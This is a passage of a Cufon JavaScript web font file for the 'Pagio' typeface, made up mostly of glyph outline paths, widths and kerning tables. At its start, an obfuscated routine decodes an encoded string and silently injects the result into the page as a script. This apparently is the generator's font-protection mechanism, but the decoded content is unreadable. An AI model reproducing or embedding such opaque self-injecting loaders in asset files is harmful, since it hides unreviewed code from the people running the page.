c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-52-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("U-XK#pI$h^LZUdBt0p)CW-WLm{IKXpLZm{*Ch^MTX[>Gi1$&,[_K~Y5BXNX$mSA2~-In#pBeMK_K~Y5nXN)Y3B_K~YN85dYN)-SW*UP~IROqM,VA[^miXh#z073jH&FnBpTEgf@G?ZD2_C1$K{e]4=t>LrweX[03mSA2~-Xn3SHE^)*DVpK4Um[WO{0@mSA2~VA4*[_K~YN{I)X1h&H0*K_K~YN$R)_K~YN2XTK8mSA2~-~_mSA2~VXBmSA2~V5BmSA2~VqemSA2~-~4iCgz0V82X-)z0V8_~^*z0V8_Ipi>iS5z0V8_I{M_~B)7~V[GmSA2~V5nPV0NmSA2~VA]md*{mSA2~Vi_OV84A{Ar7B2Dm)_UIB_K~YN{I,4z0V8_~-Iz0V82XVNFR&8$^T?n^[_K~YN_i,iGVKGnmSA2~-i1mSA2~-N2ANAHip)~RS*PqpitVV~@mSA2~Vi2[)_K~Y5BR[A&PTI2#-B$UdW&U,_gOV8GzYK&PT8G#YK2Pp_B#p0$hd_TO^WZX&4T#SB2hS~L7e$th^iEPK]EO1ge0e0zP&nwUY>=0e0emd42i^0g#K2ZieEg*d>Z0-[10dHG#{IH0-BD#&4E#eI$#p)?X,ngXpLCUY?gO-2tUC?gU^0#iK?gm[$Lz)?gmm$gUdnj")}catch(e){}delete _cufon_bridge_;return f})({"w":180,"face":{"font-family":"Pagio","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 3 2 2 1 4 2 2 3","ascent":"246","descent":"-114","x-height":"3","bbox":"-16 -337 372 83.0327","underline-thickness":"18","underline-position":"-18","stemh":"14","stemv":"17","unicode-range":"U+0020-U+017E"}}));Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"202,-246r-2,16v-97,-16,-168,56,-168,130v0,87,93,110,156,60r-3,21v-73,45,-169,20,-172,-80v-3,-83,81,-167,189,-147","w":198,"k":{"X":-4,"A":-7,"\u00c1":-7,"Z":-7,"\u017d":-7,",":-18,".":-18,"q":-2,"o":-4,"\u00f3":-4}},{"d":"6,0r5,-32r21,0v-3,31,-10,65,-35,73v1,-19,19,-23,17,-41r-8,0","w":60,"k":{"J":-22,"j":-14,"T":22,"\u0164":22,"V":32,"W":32,"Y":43,"\u00dd":43,"A":-22,"\u00c1":-22,"C":11,"\u010c":11,"G":11,"Q":11,"Z":-14,"\u017d":-14,"a":4,"\u00e1":4,"e":7,"\u00e9":7,"\u011b":7,"v":14,"w":14}},{"d":"119,-150r0,18v-20,-13,-36,-18,-52,-18v-18,0,-34,10,-34,23v0,31,79,42,79,88v-1,47,-79,53,-108,21r5,-17v14,15,32,23,50,23v20,0,36,-10,36,-25v0,-33,-77,-47,-77,-88v1,-42,69,-51,101,-25","w":127,"k":{"w":4,",":-11,".":-11,"t":-4,"\u0165":-4,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"g":7}},{"d":"49,-246r56,0v43,0,66,28,66,64v0,34,-22,60,-57,67v26,23,49,81,70,115r-19,0r-42,-73v-24,-49,-24,-42,-75,-42r-17,115r-17,0xm63,-230r-13,99v52,3,104,-2,102,-50v0,-19,-10,-49,-49,-49r-40,0","k":{";":-11,"T":25,"\u0164":25,"V":11,"W":14,"Y":27,"\u00dd":27,"A":-11,"\u00c1":-11,"C":9,"\u010c":9,"G":9,"Q":7,"e":7,"\u00e9":7,"\u011b":7,"v":11,"w":7,"O":7,"U":10,"\u00da":10,"\u016e":10,",":-13,".":-11,"o":4,"\u00f3":4,":":-11}},{"d":"133,-32r0,17v-47,39,-122,11,-122,-60v0,-51,33,-90,75,-90v39,0,60,32,57,81r-115,0v-10,61,61,95,105,52xm31,-98r96,0v1,-33,-16,-52,-42,-52v-25,0,-50,24,-54,52xm78,-182r-3,-71r13,0r7,49r54,-49r14,0r-65,71r-20,0","w":156,"k":{"a":-4,"\u00e1":-4,"v":5,"w":4,",":-11,".":-11,"x":2,"g":2}},{"d":"62,-194r-5,41v49,-31,105,2,105,61v0,47,-42,106,-127,94r-11,78r-16,0r29,-209v-22,16,-26,43,-33,33v0,-10,18,-34,35,-47r7,-51r16,0xm55,-140r-19,130v85,10,109,-39,109,-81v0,-53,-48,-73,-90,-49","w":171,"k":{"x":11,"v":4,"a":-4,"\u00e1":-4,"w":4,"d":-4,"\u010f":-4,"o":-7,"\u00f3":-7,"z":9,"\u017e":9,"g":4}},{"d":"238,-246r-35,248r-8,0r-134,-212r-30,210r-17,0r35,-246r10,0r133,211r29,-211r17,0","w":243},{"d":"39,-246r24,0v1,31,-1,59,-5,85r-15,0v-3,-27,-5,-55,-4,-85","w":78},{"d":"30,-17r173,0r-2,17r-204,0r0,-6r206,-223r-166,0r2,-17r196,0r0,6","w":223,"k":{"C":11,"\u010c":11,"G":11,"Q":11,"a":11,"\u00e1":11,"e":18,"v":18,"w":18,"O":11,"c":14,"\u010d":14,"d":18,"\u010f":18,"q":14,"o":9,"\u00f3":9,"g":14}},{"d":"10,0r4,-32r21,0r-4,32r-21,0","w":60},{"d":"157,-162r0,7r-134,141r113,0r-2,14r-140,0r0,-6r135,-142r-106,0r2,-14r132,0","w":153,"k":{"y":-7,"\u00fd":-7,"a":5,"\u00e1":5,"e":5,"\u00e9":5,"\u011b":5,"v":-10,"w":-9,"t":-7,"\u0165":-7,"c":5,"\u010d":5,"d":5,"\u010f":5,"q":5}},{"d":"153,-162r-23,162r-16,0r4,-29v-19,21,-41,32,-63,32v-21,0,-44,-15,-39,-49r16,-116r16,0r-16,116v-3,21,8,34,28,34v19,0,37,-11,61,-38r16,-112r16,0xm78,-213v0,12,9,21,21,21v12,0,21,-9,21,-21v0,-12,-9,-21,-21,-21v-12,0,-21,9,-21,21xm68,-213v0,-17,14,-31,31,-31v17,0,31,14,31,31v0,17,-14,31,-31,31v-17,0,-31,-14,-31,-31","w":164,"k":{"y":-7,"\u00fd":-7,"e":4,"\u00e9":4,"\u011b":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"o":4,"\u00f3":4,"g":7}},{"d":"244,-246r-34,246r-17,0r16,-117r-161,0r-17,117r-17,0r35,-246r17,0r-16,112r161,0r16,-112r17,0","w":249},{"d":"36,-246r17,0r0,329r-17,0r0,-329","w":78},{"d":"8,0r4,-32r21,0v-1,32,-10,65,-35,73v2,-18,18,-23,17,-41r-7,0xm24,-130r5,-32r21,0r-4,32r-22,0","w":60},{"d":"108,-249r21,0v-93,82,-122,212,-57,332r-18,0v-60,-121,-41,-238,54,-332","w":108,"k":{"J":-29,"j":-22,"T":-14,"\u0164":-14,"V":-14,"W":-14,"X":-7,"Y":-18,"\u00dd":-18,"f":-7}},{"d":"208,-246r-135,113r129,133r-22,0r-130,-133r-19,133r-17,0r35,-246r17,0r-15,108r132,-108r25,0","w":204,"k":{"y":13,"\u00fd":13,"T":5,"\u0164":5,"A":-7,"\u00c1":-7,"C":22,"\u010c":22,"G":22,"Q":20,"Z":-14,"\u017d":-14,"a":11,"\u00e1":11,"e":14,"\u00e9":14,"\u011b":14,"v":23,"w":20,"O":20,"U":16,"\u00da":16,"\u016e":16,",":-7,".":-7,"t":11,"\u0165":11,"u":7,"\u016f":7,"c":14,"\u010d":14,"d":14,"\u010f":14,"q":14,"o":11,"\u00f3":11,":":-7,";":-7,"z":-11,"\u017e":-11}},{"d":"49,-162v-1,14,-7,32,-6,45v30,-39,36,-55,73,-45r0,16v-36,-16,-51,19,-76,50r-14,96r-16,0r23,-162r16,0","w":111,"k":{"y":-7,"\u00fd":-7,"a":9,"\u00e1":9,"e":9,"\u00e9":9,"\u011b":9,"v":-11,"w":-9,",":14,".":14,"t":-11,"\u0165":-11,"c":12,"\u010d":12,"d":11,"\u010f":11,"q":11,"o":5,"\u00f3":5,":":-14,";":-14,"k":-4}},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"98,-162r-2,12r-38,0r-31,222r-15,0r30,-222r-32,0r2,-12r32,0v-1,-65,49,-108,108,-77r-2,14v-37,-22,-83,-7,-85,34r-5,29r38,0","w":90,"k":{"}":-49,"x":7,"v":-4,"q":5,"]":-49,"?":-58,"*":-58,"!":-43,"y":-11,"\u00fd":-11,"j":-3,"a":7,"\u00e1":1,"e":7,"\u00e9":-4,"\u011b":-4,"w":-4,"t":-7,"\u0165":-7,"c":7,"\u010d":7,"d":5,"\u010f":5,"f":-11,"o":5,"\u00f3":-2,"b":-5,"h":-6,"i":-3,"\u00ed":-3,")":-49,"k":-6,"l":-6}},{"d":"226,-246r-23,159v-9,65,-57,90,-100,90v-47,0,-88,-35,-80,-91r23,-158r17,0r-22,155v-8,54,27,78,64,78v51,0,76,-40,81,-75r23,-158r17,0xm202,-308r-72,46r-17,0r44,-46r45,0","w":228,"k":{"A":14,"\u00c1":14,"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,",":5,".":5,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"x":18,"r":4,"\u0159":4,"g":7,"n":4,"m":4}},{"d":"49,-162r-4,28v23,-21,40,-31,62,-31v21,0,36,16,38,35v21,-23,41,-35,62,-35v76,0,23,107,24,165r-16,0r17,-117v-3,-58,-61,-29,-87,2r-16,115r-16,0r16,-113v1,-63,-60,-36,-87,-2r-16,115r-16,0r23,-162r16,0","w":265,"k":{"x":4,"v":9,"w":7,"u":4,"\u016f":4,"g":9}},{"d":"20,-63r21,-183r20,0r-34,183r-7,0xm4,0r4,-32r21,0r-4,32r-21,0","w":60},{"d":"50,-162r-23,162r-16,0r23,-162r16,0xm59,-231r-4,26r-16,0r4,-26r16,0","w":63,"k":{"y":-11,"\u00fd":-11}},{"d":"49,-162v-1,14,-7,32,-6,45v30,-39,36,-55,73,-45r0,16v-36,-16,-51,19,-76,50r-14,96r-16,0r23,-162r16,0xm61,-182r-3,-71r13,0r7,49r54,-49r14,0r-65,71r-20,0","w":111,"k":{"y":-7,"\u00fd":-7,"a":9,"\u00e1":9,"e":9,"\u00e9":9,"\u011b":9,"v":-11,"w":-9,",":14,".":14,"t":-11,"\u0165":-11,"c":12,"\u010d":12,"d":11,"\u010f":11,"q":11,"o":5,"\u00f3":5,":":-14,";":-14,"k":-4}},{"d":"143,-162r-128,245r-18,0r45,-85r-30,-160r15,0r27,138r72,-138r17,0","w":135,"k":{"y":-11,"\u00fd":-11,"a":5,"\u00e1":5,"e":4,"\u00e9":4,"\u011b":4,",":7,".":7,"t":-4,"\u0165":-4,"u":4,"\u016f":4,"c":5,"\u010d":5,"d":4,"\u010f":4,"q":4,"g":7}},{"d":"172,-96r-2,12r-40,0r-12,84r-16,0r12,-84r-101,0r1,-7r134,-158r5,0r-21,153r40,0xm131,-208v-32,31,-64,77,-96,112r81,0"},{"d":"29,-105r0,-19v20,-14,36,-21,50,-21v27,0,67,28,89,28v13,0,24,-6,50,-24r0,20v-47,46,-90,-8,-138,-8v-15,0,-25,5,-51,24","w":237},{"d":"174,-246r-2,17r-108,0r-14,95r103,0r-3,17r-102,0r-15,100r146,0r-3,17r-162,0r35,-246r125,0xm99,-262r-32,-48r19,0r27,32v24,-10,36,-33,72,-32r-57,48r-29,0","k":{"y":7,"\u00fd":7,"V":13,"W":13,"X":-4,"Y":7,"\u00dd":7,"A":-7,"\u00c1":-7,"C":11,"\u010c":11,"G":11,"Q":13,"Z":-11,"\u017d":-11,"e":7,"\u00e9":7,"\u011b":7,"v":11,"w":11,"O":13,",":-11,".":-14,"M":-11,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"o":4,"\u00f3":4,"x":-11,"B":-4,"D":-4,"\u010e":-4,"E":-4,"\u00c9":-4,"\u011a":-4,"F":-4,"H":-4,"I":-4,"\u00cd":-4,"K":-4,"L":-4,"P":-4,"R":-4,"\u0158":-4,":":-14,";":-14,"z":-7,"\u017e":-7,"!":-11,"?":-4,"N":-4,"\u0147":-4}},{"d":"213,-162r16,0r-85,165r-6,0r-22,-127r-63,127r-6,0r-38,-165r15,0r31,130r64,-130r6,0r22,130","w":221,"k":{"y":-14,"\u00fd":-14,"a":7,"\u00e1":7,"e":7,"\u00e9":7,"\u011b":7,"v":-4,"w":-4,",":11,".":11,"t":-4,"\u0165":-4,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"o":7,"\u00f3":7,"g":4}},{"d":"158,-162r-72,79r49,83r-18,0r-42,-72r-66,72r-20,0r79,-85r-44,-77r17,0r38,65r60,-65r19,0","w":151,"k":{"q":7,"y":-11,"\u00fd":-11,"a":9,"\u00e1":9,"e":13,"\u00e9":13,"\u011b":13,"c":13,"\u010d":13,"d":9,"\u010f":9,"o":5,"\u00f3":5,"g":7}},{"d":"122,-249r57,249r-17,0r-21,-89r-91,0r-41,89r-18,0r116,-249r15,0xm112,-219v-20,36,-35,77,-54,114r80,0","w":189,"k":{"y":9,"\u00fd":9,"T":29,"\u0164":29,"V":25,"W":22,"X":-7,"Y":25,"\u00dd":25,"A":-7,"\u00c1":-7,"C":11,"\u010c":11,"G":7,"Q":11,"Z":-11,"\u017d":-11,"e":4,"\u00e9":4,"\u011b":4,"v":11,"w":11,"O":11,"S":4,"\u0160":4,"U":11,"\u00da":11,"\u016e":11,",":-7,".":-7,"t":5,"\u0165":5,"u":4,"\u016f":4,"M":-7,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"f":11}},{"d":"14,0r35,-246v96,-8,170,27,170,125v0,72,-54,121,-126,121r-79,0xm64,-230r-30,214r52,0v88,0,114,-61,114,-105v0,-75,-58,-115,-136,-109xm101,-262r-33,-48r19,0r27,32v25,-10,37,-33,73,-32r-57,48r-29,0","w":229,"k":{"T":27,"\u0164":27,"V":18,"W":25,"X":22,"Y":25,"\u00dd":25,"A":7,"\u00c1":7,"Z":14,"\u017d":14,"a":-2,"\u00e1":-2,"O":5,"S":11,"\u0160":11,",":9,".":9,"o":-4,"\u00f3":-4,"x":14}},{"d":"157,-162r0,7r-134,141r113,0r-2,14r-140,0r0,-6r135,-142r-106,0r2,-14r132,0xm79,-182r-3,-71r13,0r7,49r54,-49r14,0r-65,71r-20,0","w":153,"k":{"y":-7,"\u00fd":-7,"a":5,"\u00e1":5,"e":5,"\u00e9":5,"\u011b":5,"v":-10,"w":-9,"t":-7,"\u0165":-7,"c":5,"\u010d":5,"d":5,"\u010f":5,"q":5}},{"d":"149,-165r-34,245r-16,0r13,-89v-53,29,-103,5,-105,-56v-2,-58,52,-111,142,-100xm114,-22r18,-131v-77,-6,-108,47,-108,88v0,54,48,71,90,43","w":160,"k":{"y":-7,"\u00fd":-7,"j":-18}},{"w":90},{"d":"50,-162r-23,162r-16,0r23,-162r16,0xm96,-238r-54,56r-12,0r38,-56r28,0","w":63,"k":{"y":-11,"\u00fd":-11}},{"d":"122,-249r57,249r-17,0r-21,-89r-91,0r-41,89r-18,0r116,-249r15,0xm112,-219v-20,36,-35,77,-54,114r80,0xm180,-308r-73,46r-16,0r44,-46r45,0","w":189,"k":{"y":9,"\u00fd":9,"T":29,"\u0164":29,"V":25,"W":22,"X":-7,"Y":25,"\u00dd":25,"A":-7,"\u00c1":-7,"C":11,"\u010c":11,"G":7,"Q":11,"Z":-11,"\u017d":-11,"e":4,"\u00e9":4,"\u011b":4,"v":11,"w":11,"O":11,"S":4,"\u0160":4,"U":11,"\u00da":11,"\u016e":11,",":-7,".":-7,"t":5,"\u0165":5,"u":4,"\u016f":4,"M":-7,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"f":11}},{"d":"7,-72v0,-60,60,-105,134,-91r11,-83r16,0r-34,244v-67,18,-127,-10,-127,-70xm139,-150v-61,-15,-117,25,-115,79v2,55,49,70,96,58","w":171,"k":{"e":4,"\u00e9":4,"\u011b":4,"c":5,"\u010d":5,"d":2,"\u010f":2,"q":2}},{"d":"228,-243r-2,16v-107,-25,-194,42,-194,125v0,76,79,113,145,72r8,-55r-55,0r2,-16r72,0r-11,79v-72,50,-175,24,-180,-81v-4,-85,97,-170,215,-140","w":221,"k":{"X":-4,",":-7,".":-7}},{"d":"28,-238r29,0r38,56r-12,0","w":119},{"d":"226,-246r-23,159v-9,65,-57,90,-100,90v-47,0,-88,-35,-80,-91r23,-158r17,0r-22,155v-8,54,27,78,64,78v51,0,76,-40,81,-75r23,-158r17,0","w":227,"k":{"A":14,"\u00c1":14,"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,",":5,".":5,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"x":18,"r":4,"\u0159":4,"g":7,"n":4,"m":4}},{"d":"226,-246r-23,159v-9,65,-57,90,-100,90v-47,0,-88,-35,-80,-91r23,-158r17,0r-22,155v-8,54,27,78,64,78v51,0,76,-40,81,-75r23,-158r17,0xm142,-337v21,0,37,16,37,37v0,21,-16,38,-37,38v-21,0,-38,-17,-38,-38v0,-21,17,-37,38,-37xm141,-325v-14,0,-25,10,-25,25v0,14,11,26,25,26v14,0,27,-12,27,-26v0,-15,-13,-25,-27,-25","w":228,"k":{"A":14,"\u00c1":14,"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,",":5,".":5,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"x":18,"r":4,"\u0159":4,"g":7,"n":4,"m":4}},{"d":"59,-246r-16,118v19,-20,38,-37,64,-37v73,0,26,109,24,165r-15,0r15,-113v4,-29,-13,-37,-27,-37v-21,0,-35,11,-64,41r-16,109r-16,0r35,-246r16,0","w":164,"k":{"v":9,"w":7,"x":4,"g":9}},{"d":"154,-162r-23,162r-16,0r3,-19v-38,39,-112,24,-112,-43v0,-59,64,-118,148,-100xm120,-37r16,-114v-61,-11,-112,30,-113,92v-1,61,67,60,97,22xm152,-238r-55,56r-12,0r38,-56r29,0","w":166,"k":{"x":4}},{"d":"153,-162r-23,162r-16,0r4,-29v-19,21,-41,32,-63,32v-21,0,-44,-15,-39,-49r16,-116r16,0r-16,116v-3,21,8,34,28,34v19,0,37,-11,61,-38r16,-112r16,0","w":164,"k":{"y":-7,"\u00fd":-7,"e":4,"\u00e9":4,"\u011b":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"o":4,"\u00f3":4,"g":7}},{"d":"140,-246r-76,111v38,-29,104,-16,104,42v0,51,-40,96,-84,96v-35,0,-61,-28,-61,-66v0,-73,67,-129,99,-183r18,0xm150,-94v0,-25,-15,-41,-39,-41v-40,0,-71,32,-71,72v0,32,18,51,44,51v36,0,66,-38,66,-82"},{"d":"182,-246r-126,246r-17,0r118,-230r-120,0r2,-16r143,0"},{"d":"85,-208r-70,208r-18,0r81,-246r15,0r44,207r110,-207r15,0r0,246r-18,0r0,-207r-109,207r-6,0","w":288,"k":{"y":-4,"\u00fd":-4,"T":13,"\u0164":13,"W":11,"Y":22,"\u00dd":22,"A":-4,"\u00c1":-4,"e":7,"g":11}},{"d":"-20,80r2,-14r59,0r44,-297r-62,0r2,-15r79,0r-48,326r-76,0","w":108},{"d":"56,0r79,-115v-38,36,-105,19,-105,-38v0,-37,27,-96,84,-96v77,0,68,95,27,154r-66,95r-19,0xm158,-184v0,-30,-18,-50,-44,-50v-36,0,-67,38,-67,81v0,26,15,42,39,42v39,0,72,-33,72,-73"},{"d":"106,-93r0,23v-36,-5,-34,51,-34,94v0,43,-17,61,-51,59r0,-20v37,8,31,-39,31,-74v0,-39,10,-61,35,-70v-35,-9,-35,-57,-35,-106v0,-33,-7,-39,-31,-39r0,-20v47,-7,51,42,51,94v0,42,9,58,34,59","w":119},{"d":"139,-97v0,65,-39,100,-77,100v-29,0,-56,-22,-56,-68v0,-59,31,-100,76,-100v35,0,57,27,57,68xm122,-97v0,-32,-15,-53,-40,-53v-62,0,-85,138,-20,138v34,0,60,-37,60,-85","w":151,"k":{"a":-2,"\u00e1":-2,"v":7,"w":7,"t":4,"\u0165":4,"d":-2,"\u010f":-2,"x":7,"z":9,"\u017e":9,"g":4}},{"d":"87,-249r16,0r-79,252r-16,0","w":101},{"d":"29,-177r189,0r0,15r-189,0r0,-15xm29,-91r189,0r0,16r-189,0r0,-16","w":237},{"d":"148,-246v1,34,-25,78,-36,74v1,-17,15,-15,17,-41r-7,0r5,-33r21,0xm101,-162r-2,12r-45,0r-17,118v-1,31,37,27,53,9r0,15v-29,26,-75,9,-67,-40r16,-102r-30,0r2,-12r29,0r6,-37r15,0r-6,37r46,0","w":141,"k":{"y":4,"\u00fd":4,"j":4,"a":4,"\u00e1":4,"e":11,"\u00e9":11,"\u011b":11,"v":4,",":-22,".":-22,"u":4,"\u016f":4,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"f":4,":":-22,";":-22,"g":9,"p":9,"\u0148":-9}},{"d":"119,-150r0,18v-20,-13,-36,-18,-52,-18v-18,0,-34,10,-34,23v0,31,79,42,79,88v-1,47,-79,53,-108,21r5,-17v14,15,32,23,50,23v20,0,36,-10,36,-25v0,-33,-77,-47,-77,-88v1,-42,69,-51,101,-25xm66,-182r-3,-71r13,0r7,49r54,-49r14,0r-65,71r-20,0","w":127,"k":{"w":4,",":-11,".":-11,"t":-4,"\u0165":-4,"c":4,"\u010d":4,"d":4,"\u010f":4,"q":4,"g":7}},{"d":"174,-246r-2,17r-108,0r-14,95r103,0r-3,17r-102,0r-15,100r146,0r-3,17r-162,0r35,-246r125,0xm191,-308r-73,46r-16,0r43,-46r46,0","k":{"y":7,"\u00fd":7,"V":13,"W":13,"X":-4,"Y":7,"\u00dd":7,"A":-7,"\u00c1":-7,"C":11,"\u010c":11,"G":11,"Q":13,"Z":-11,"\u017d":-11,"e":7,"\u00e9":7,"\u011b":7,"v":11,"w":11,"O":13,",":-11,".":-14,"M":-11,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"o":4,"\u00f3":4,"x":-11,"B":-4,"D":-4,"\u010e":-4,"E":-4,"\u00c9":-4,"\u011a":-4,"F":-4,"H":-4,"I":-4,"\u00cd":-4,"K":-4,"L":-4,"P":-4,"R":-4,"\u0158":-4,":":-14,";":-14,"z":-7,"\u017e":-7,"!":-11,"?":-4,"N":-4,"\u0147":-4}},{"d":"49,-162v0,9,-5,20,-3,28v17,-17,37,-31,61,-31v70,0,27,108,25,165r-16,0r15,-109v2,-65,-59,-43,-89,-6r-16,115r-16,0r23,-162r16,0","w":164,"k":{"v":9,"w":7,"x":3,"g":9}},{"d":"186,-246r-2,17r-73,0r-32,229r-17,0r32,-229r-72,0r2,-17r162,0xm88,-262r-32,-48r19,0r27,32v24,-10,36,-33,72,-32r-57,48r-29,0","w":164,"k":{"y":13,"\u00fd":13,"j":7,"T":-4,"\u0164":-4,"Y":-7,"\u00dd":-7,"A":25,"\u00c1":25,"C":20,"\u010c":20,"G":20,"Q":18,"a":40,"\u00e1":32,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":16,"O":18,",":36,".":36,"t":18,"\u0165":18,"u":22,"\u016f":22,"M":14,"c":36,"\u010d":36,"d":40,"\u010f":40,"q":40,"f":14,"o":40,"\u00f3":29,"x":25,":":9,";":9,"z":18,"\u017e":18,"?":-18,"r":22,"\u0159":22,"g":36,"n":22,"i":7,"\u00ed":7,"m":22,"p":22,"\u0148":11,"s":20,"\u0161":20,")":-22,"]":-22,"}":-22,"-":43}},{"d":"59,-246r-14,105v41,-46,109,-22,109,43v0,61,-60,117,-146,98r35,-246r16,0xm39,-109r-13,96v71,9,111,-32,111,-84v0,-68,-91,-65,-98,-12","w":163,"k":{"a":-4,"\u00e1":-4,"v":4,"w":4,"d":-4,"\u010f":-4,"o":-7,"\u00f3":-7,"x":7,"z":9,"\u017e":9,"g":4}},{"d":"140,-235r-4,15v-40,-26,-86,-10,-86,34v0,55,80,53,80,123v0,61,-75,83,-119,50r4,-17v41,31,96,21,96,-33v0,-55,-80,-62,-80,-121v0,-56,67,-83,109,-51xm81,-262r-33,-48r19,0r27,32v25,-10,37,-33,73,-32r-58,48r-28,0","w":146,"k":{"y":5,"\u00fd":5,"V":11,"W":11,"Y":13,"\u00dd":13,"A":4,"\u00c1":4,"C":5,"\u010c":5,"G":5,"Q":4,"e":4,"\u00e9":4,"\u011b":4,"v":14,"w":11,"O":4,"S":7,"\u0160":7,",":-9,".":-9,"u":2,"\u016f":2,"d":2,"\u010f":2,"q":2,"f":11,"r":4,"\u0159":4,"g":7,"n":4,"m":4}},{"d":"66,-246r-35,246r-17,0r35,-246r17,0","w":71,"k":{"x":7}},{"d":"30,-17r173,0r-2,17r-204,0r0,-6r206,-223r-166,0r2,-17r196,0r0,6xm118,-262r-32,-48r18,0r28,32v24,-10,36,-33,72,-32r-57,48r-29,0","w":223,"k":{"C":11,"\u010c":11,"G":11,"Q":11,"a":11,"\u00e1":11,"e":18,"v":18,"w":18,"O":11,"c":14,"\u010d":14,"d":18,"\u010f":18,"q":14,"o":9,"\u00f3":9,"g":14}},{"d":"133,-32r0,17v-47,39,-122,11,-122,-60v0,-51,33,-90,75,-90v39,0,60,32,57,81r-115,0v-10,61,61,95,105,52xm31,-98r96,0v1,-33,-16,-52,-42,-52v-25,0,-50,24,-54,52xm137,-238r-55,56r-11,0r37,-56r29,0","w":156,"k":{"a":-4,"\u00e1":-4,"v":5,"w":4,",":-11,".":-11,"x":2,"g":2}},{"d":"101,-162r-2,12r-45,0r-17,118v-1,31,37,27,53,9r0,15v-29,26,-75,9,-67,-40r16,-102r-30,0r2,-12r29,0r6,-37r15,0r-6,37r46,0","w":104,"k":{"y":4,"\u00fd":4,"j":4,"a":4,"\u00e1":4,"e":11,"\u00e9":11,"\u011b":11,"v":4,",":-22,".":-22,"u":4,"\u016f":4,"c":7,"\u010d":7,"d":7,"\u010f":7,"q":7,"f":4,":":-22,";":-22,"g":9,"p":9,"\u0148":-9}},{"d":"129,-249r79,95r-11,9r-68,-81r-67,81r-12,-9","w":236},{"d":"190,-246r-91,119r-18,127r-17,0r18,-127r-62,-119r19,0r53,102r78,-102r20,0xm179,-308r-73,46r-17,0r44,-46r46,0","w":165,"k":{"y":14,"\u00fd":14,"j":7,"V":-11,"W":-7,"Y":-7,"\u00dd":-7,"A":31,"\u00c1":31,"C":11,"\u010c":11,"G":11,"Q":14,"a":40,"\u00e1":40,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":18,"O":14,"S":5,"\u0160":5,",":29,".":29,"t":11,"\u0165":11,"u":22,"\u016f":22,"M":11,"c":40,"\u010d":40,"d":40,"\u010f":40,"q":40,"f":14,"o":36,"\u00f3":36,"x":25,"z":25,"\u017e":25,"?":-14,"r":22,"\u0159":22,"g":36,"n":18,"i":11,"\u00ed":11,"m":18,"p":22,"\u0148":18,"s":18,"\u0161":18,")":-18,"]":-18,"}":-18,"-":32}},{"d":"116,-249v72,0,83,103,14,120v75,26,26,132,-44,132v-80,0,-97,-120,-11,-135v-59,-25,-24,-117,41,-117xm108,-138v66,1,69,-96,8,-96v-60,-5,-78,97,-8,96xm86,-12v69,0,92,-113,12,-111v-37,0,-63,26,-63,61v0,32,24,50,51,50"},{"d":"156,-15r-3,15r-140,0v37,-35,65,-73,91,-106v29,-38,44,-62,44,-86v0,-55,-62,-51,-101,-18r3,-19v41,-33,116,-26,115,36v0,44,-44,95,-115,178r106,0"},{"d":"24,-130r5,-32r21,0r-4,32r-22,0xm5,0r5,-32r21,0r-4,32r-22,0","w":60},{"d":"143,-162r-128,245r-18,0r45,-85r-30,-160r15,0r27,138r72,-138r17,0xm132,-238r-55,56r-11,0r37,-56r29,0","w":135,"k":{"y":-11,"\u00fd":-11,"a":5,"\u00e1":5,"e":4,"\u00e9":4,"\u011b":4,",":7,".":7,"t":-4,"\u0165":-4,"u":4,"\u016f":4,"c":5,"\u010d":5,"d":4,"\u010f":4,"q":4,"g":7}},{"d":"59,-246r-23,160r96,-76r24,0r-96,76r101,86r-23,0r-102,-86r-12,86r-16,0r35,-246r16,0","w":157,"k":{"y":-7,"\u00fd":-7,"a":4,"\u00e1":4,"e":11,"\u00e9":11,"\u011b":11,"v":7,",":-11,".":-11,"t":-5,"\u0165":-5,"c":11,"\u010d":11,"d":13,"\u010f":13,"q":9,"o":4,"\u00f3":4,"g":7,"p":4,"s":-2,"\u0161":-2}},{"d":"29,-118r0,-16r189,-79r0,18r-167,69r167,69r0,18","w":237},{"d":"122,-246r-34,246r-16,0r34,-246r16,0"},{"d":"-10,83r-21,0v93,-82,122,-211,58,-332r17,0v60,121,41,238,-54,332","w":108},{"d":"161,-165r-2,12v-14,1,-33,-2,-45,1v33,17,29,70,4,90v-19,24,-75,11,-84,36v0,9,8,10,33,16v34,9,67,16,67,46v0,21,-19,47,-72,47v-46,0,-66,-21,-66,-41v0,-21,20,-33,56,-42v-44,-6,-44,-43,0,-49v-59,-22,-35,-116,32,-116r77,0xm81,-152v-52,-3,-72,92,-9,95v68,-5,62,-94,9,-95xm68,6v-38,6,-56,22,-56,39v0,16,17,26,47,26v44,0,59,-17,59,-34v0,-16,-17,-24,-50,-31","w":153,"k":{"y":-14,"\u00fd":-14,"j":-18,"a":2,"\u00e1":2,"e":4,"\u00e9":4,"\u011b":4,"v":-7,"w":-7,"t":-11,"\u0165":-11,"f":-7}},{"d":"218,-118r-189,79r0,-18r167,-69r-167,-69r0,-18r